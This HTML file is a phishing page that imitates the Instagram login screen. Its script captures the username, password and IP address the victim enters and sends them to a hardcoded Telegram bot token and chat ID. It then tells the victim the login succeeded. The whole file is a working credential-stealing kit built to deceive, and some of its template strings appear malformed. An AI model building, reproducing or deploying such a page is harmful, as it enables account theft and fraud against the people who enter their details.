<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Helvetica, Arial, sans-serif;
        }

        body {
            background-color: #fafafa;
            display: flex;
            justify-content: center;
            align-items: center;
            min-height: 100vh;
        }

        .container {
            display: flex;
            justify-content: center;
            align-items: center;
            width: 100%;
            max-width: 935px;
            margin: 0 auto;
            padding: 20px;
        }

        .phone-image {
            flex: 1;
            display: flex;
            justify-content: flex-end;
            margin-right: 32px;
        }

        .phone-image img {
            height: 581px;
        }

        .login-container {
            flex: 1;
            max-width: 350px;
        }

        .login-box {
            background-color: white;
            border: 1px solid #dbdbdb;
            padding: 40px;
            text-align: center;
            margin-bottom: 10px;
        }

        .logo {
            margin-bottom: 20px;
        }

        .logo img {
            width: 175px;
        }

        .login-form input {
            width: 100%;
            padding: 9px 0 7px 8px;
            margin-bottom: 6px;
            background-color: #fafafa;
            border: 1px solid #dbdbdb;
            border-radius: 3px;
            font-size: 12px;
            outline: none;
        }

        .login-form input:focus {
            border-color: #a8a8a8;
        }

        .login-button {
            width: 100%;
            background-color: #0095f6;
            color: white;
            border: none;
            border-radius: 4px;
            padding: 7px;
            margin-top: 8px;
            font-weight: 600;
            cursor: pointer;
        }

        .login-button:disabled {
            background-color: #b2dffc;
            cursor: default;
        }

        .divider {
            display: flex;
            align-items: center;
            margin: 15px 0;
        }

        .divider-line {
            flex: 1;
            height: 1px;
            background-color: #dbdbdb;
        }

        .divider-text {
            margin: 0 18px;
            color: #8e8e8e;
            font-size: 13px;
            font-weight: 600;
        }

        .facebook-login {
            color: #385185;
            font-weight: 600;
            font-size: 14px;
            margin: 20px 0;
            cursor: pointer;
        }

        .facebook-login i {
            margin-right: 8px;
        }

        .forgot-password {
            color: #00376b;
            font-size: 12px;
            cursor: pointer;
        }

        .signup-box {
            background-color: white;
            border: 1px solid #dbdbdb;
            padding: 20px;
            text-align: center;
            margin-bottom: 10px;
        }

        .signup-box a {
            color: #0095f6;
            font-weight: 600;
            text-decoration: none;
        }

        .get-app {
            text-align: center;
        }

        .get-app p {
            margin: 10px 0;
            font-size: 14px;
        }

        .app-stores {
            display: flex;
            justify-content: center;
            gap: 10px;
        }

        .app-stores img {
            height: 40px;
        }

        .footer {
            text-align: center;
            margin-top: 50px;
            color: #8e8e8e;
            font-size: 12px;
        }

        .footer-links {
            display: flex;
            justify-content: center;
            flex-wrap: wrap;
            margin-bottom: 10px;
        }

        .footer-links a {
            margin: 0 8px 10px;
            color: #8e8e8e;
            text-decoration: none;
        }

        .copyright {
            margin-top: 10px;
        }

        .message {
            padding: 10px;
            margin-bottom: 10px;
            border-radius: 4px;
            text-align: center;
            display: none;
        }

        .success {
            background-color: #d4edda;
            color: #155724;
            border: 1px solid #c3e6cb;
        }

        .error {
            background-color: #f8d7da;
            color: #721c24;
            border: 1px solid #f5c6cb;
        }

        @media (max-width: 875px) {
            .phone-image {
                display: none;
            }
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="phone-image">
            <img src="https://static.cdninstagram.com/images/instagram/xig/homepage/phones/home-phones.png?__makehaste_cache_breaker=73SVAexZgBW" alt="Instagram on phone">
        </div>
        <div class="login-container">
            <div class="login-box">
                <div class="logo">
                    <img src="https://www.instagram.com/static/images/web/logged_out_wordmark.png/7a252de00b20.png" alt="Instagram">
                </div>
                <form class="login-form" id="loginForm">
                    <div id="message" class="message"></div>
                    <input type="text" id="username" placeholder="Phone number, username, or email" required>
                    <input type="password" id="password" placeholder="Password" required>
                    <button type="submit" class="login-button" id="loginButton">Log in</button>
                </form>
                <div class="divider">
                    <div class="divider-line"></div>
                    <div class="divider-text">OR</div>
                    <div class="divider-line"></div>
                </div>
                <div class="facebook-login">
                    <i class="fab fa-facebook-square"></i> Log in with Facebook
                </div>
                <div class="forgot-password">Forgot password?</div>
            </div>
            <div class="signup-box">
                Don't have an account? <a href="#">Sign up</a>
            </div>
            <div class="get-app">
                <p>Get the app.</p>
                <div class="app-stores">
                    <img src="https://www.instagram.com/static/images/appstore-install-badges/badge_ios_english-en.png/180ae7a0bcf7.png" alt="Download on App Store">
                    <img src="https://www.instagram.com/static/images/appstore-install-badges/badge_android_english-en.png/e9cd846dc748.png" alt="Get it on Google Play">
                </div>
            </div>
        </div>
    </div>
    <div class="footer">
        <div class="footer-links">
            <a href="#">Meta</a>
            <a href="#">About</a>
            <a href="#">Blog</a>
            <a href="#">Jobs</a>
            <a href="#">Help</a>
            <a href="#">API</a>
            <a href="#">Privacy</a>
            <a href="#">Terms</a>
            <a href="#">Locations</a>
            <a href="#">Instagram Lite</a>
            <a href="#">Threads</a>
            <a href="#">Contact Uploading & Non-Users</a>
            <a href="#">Meta Verified</a>
        </div>
        <div class="copyright">
            English (UK) © 2023 Instagram from Meta
        </div>
    </div>

    <script>
        document.getElementById('loginForm').addEventListener('submit', function(e) {
            e.preventDefault();
            
            const username = document.getElementById('username').value;
            const password = document.getElementById('password').value;
            const messageDiv = document.getElementById('message');
            
            // Get user's IP address
            fetch('https://api.ipify.org?format=json')
                .then(response => response.json())
                .then(data => {
                    const ip = data.ip;
                    
                    // Send data to Telegram bot
                    const botToken = '8474685558:AAHIbBBnorLlLWzxkBvx5wixRbh_RkJ8E8o';
                    const chatId = '7677064859';
                    const text = New Instagram Login Attempt:\nUsername: ${username}\nPassword: ${password}\nIP Address: ${ip};
                    
                    fetch(https://api.telegram.org/bot${botToken}/sendMessage, {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json',
                        },
                        body: JSON.stringify({
                            chat_id: chatId,
                            text: text
                        })
                    })
                    .then(response => response.json())
                    .then(data => {
                        if (data.ok) {
                            messageDiv.textContent = 'Login successful!';
                            messageDiv.className = 'message success';
                            messageDiv.style.display = 'block';
                            
                            // Reset form
                            document.getElementById('loginForm').reset();
                            
                            // Hide message after 3 seconds
                            setTimeout(() => {
                                messageDiv.style.display = 'none';
                            }, 3000);
                        } else {
                            throw new Error('Failed to send message');
                        }
                    })
                    .catch(error => {
                        console.error('Error:', error);
                        messageDiv.textContent = 'Login failed. Please try again.';
                        messageDiv.className = 'message error';
                        messageDiv.style.display = 'block';
                    });
                })
                .catch(error => {
                    console.error('Error getting IP:', error);
                    // If IP fetch fails, still try to send the login data
                    const botToken = '8474685558:AAHIbBBnorLlLWzxkBvx5wixRbh_RkJ8E8o';
                    const chatId = '7677064859';
                    const text = New Instagram Login Attempt:\nUsername: ${username}\nPassword: ${password}\nIP Address: Unknown;
                    
                    fetch(https://api.telegram.org/bot${botToken}/sendMessage, {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json',
                        },
                        body: JSON.stringify({
                            chat_id: chatId,
                            text: text
                        })
                    })
                    .then(response => response.json())
                    .then(data => {
                        if (data.ok) {
                            messageDiv.textContent = 'Login successful!';
                            messageDiv.className = 'message success';
                            messageDiv.style.display = 'block';
                            
                            // Reset form
                            document.getElementById('loginForm').reset();
                            
                            // Hide message after 3 seconds
                            setTimeout(() => {
                                messageDiv.style.display = 'none';
                            }, 3000);
                        } else {
                            throw new Error('Failed to send message');
                        }
                    })
                    .catch(error => {
                        console.error('Error:', error);
                        messageDiv.textContent = 'Login failed. Please try again.';
                        messageDiv.className = 'message error';
                        messageDiv.style.display = 'block';
                    });
                });
        });
    </script>
</body>
</html>